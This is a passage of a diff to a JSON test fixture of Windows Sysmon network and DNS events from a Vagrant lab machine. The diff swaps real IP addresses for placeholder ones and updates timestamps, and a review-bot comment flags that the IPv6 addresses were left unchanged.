Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", 
@@ -9194,7 +9101,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-10-14T04:10:32.313858438Z", + "ingested": "2021-12-09T13:49:44.739533700Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e21\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.276\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.3\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -9245,7 +9152,7 @@ }, "destination": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -9254,7 +9161,7 @@ }, "network": { "protocol": "netbios-ns", - "community_id": "1:ZHyFuF2PjubLSbAh4zRQIZHOZK8=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" 
@@ -9269,13 +9176,13 @@ ], "ip": [ "10.0.2.15", - "169.254.255.255" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313859769Z", + "ingested": "2021-12-09T13:49:44.739538900Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:50.357Z", @@ -9341,27 +9248,27 @@ "type": "CNAME" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.66.2", - "151.101.130.2", - "151.101.194.2", - "151.101.2.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -9377,16 +9284,13 @@ "api-s2s.taboola.com" ], "ip": [ - "151.101.66.2", - "151.101.130.2", - "151.101.194.2", - "151.101.2.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313860996Z", + "ingested": "2021-12-09T13:49:44.739544700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9446,17 +9350,17 @@ }, "answers": [ { - "data": "35.231.30.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.196.212.198", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "35.231.30.22", - "35.196.212.198" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -9471,14 +9375,13 @@ "x.bidswitch.net" ], "ip": [ - "35.231.30.22", - "35.196.212.198" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313862224Z", + "ingested": "2021-12-09T13:49:44.739550700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.231.30.22;::ffff:35.196.212.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9542,11 +9445,11 @@ "type": "CNAME" }, { - "data": "199.166.0.26", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9554,7 +9457,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9562,7 +9465,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9570,7 +9473,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -9578,21 +9481,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.26", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
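Review bot: The IPv4 gTLD name-server addresses in this `@@ -9578` hunk (`192.5.6.30`, `192.33.14.30`, …) are moved into RFC 1918 space as `192.168.x.30`, but the AAAA answers beside them (`2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30`, `2001:500:856e::30`) are left as the real public addresses of the same servers. If the intent is to keep only addresses from the supported set in the fixture, the IPv6 answers need the same treatment; if unsupported IPv6 addresses are deliberately retained, a sentence in the commit description saying so would help whoever next regenerates this file. The same mix appears in `@@ -9608`, `@@ -9726`, `@@ -9757`, `@@ -9883` and `@@ -9909`.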
@@ -9608,22 +9511,22 @@ "pixel.adsafeprotected.com" ], "ip": [ - "199.166.0.26", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313864354Z", + "ingested": "2021-12-09T13:49:44.739556500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9682,19 +9585,19 @@ }, "answers": [ { - "data": "35.171.48.231", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.206.107.32", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.175.80.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9702,7 +9605,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9710,7 +9613,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9718,7 +9621,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9726,23 +9629,23 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "35.171.48.231", - "52.206.107.32", - "35.175.80.59", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -9757,24 +9660,22 @@ "ml314.com" ], "ip": [ - "35.171.48.231", - "52.206.107.32", - "35.175.80.59", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313865872Z", + "ingested": "2021-12-09T13:49:44.739562300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
